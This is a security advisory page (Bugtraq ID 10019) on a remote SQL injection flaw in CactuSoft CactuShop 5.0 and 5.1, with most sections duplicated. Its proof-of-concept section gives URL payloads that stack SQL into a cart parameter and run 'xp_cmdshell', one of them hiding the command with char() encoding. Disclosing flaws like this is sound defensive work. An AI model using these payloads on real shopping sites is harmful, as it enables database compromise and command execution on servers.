Cactusoft CactuShop SQL Injection Vulnerability
BID:10019
Info
Cactusoft CactuShop SQL Injection Vulnerability
| Bugtraq ID: | 10019 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 31 2004 12:00AM |
| Updated: | Mar 31 2004 12:00AM |
| Credit: | Discovery of this issue is credited to Nick Gudov <[email protected]>. |
| Vulnerable: |
CactuSoft CactuShop 5.1 CactuSoft CactuShop 5.0 |
| Not Vulnerable: | |
Discussion
Cactusoft CactuShop SQL Injection Vulnerability
Reportedly CactuShop is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user-supplied URI input before using it to craft an SQL query.
As a result of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.
Reportedly CactuShop is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user-supplied URI input before using it to craft an SQL query.
As a result of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.
Exploit / POC
Cactusoft CactuShop SQL Injection Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
Solution / Fix
Cactusoft CactuShop SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Cactusoft CactuShop SQL Injection Vulnerability
References:
References:
- CactuShop (CactuSoft)
- CactuSoft CactuShop 5.x shopping cart software multiple security vulnerabilities (S-Quadra Security Research
)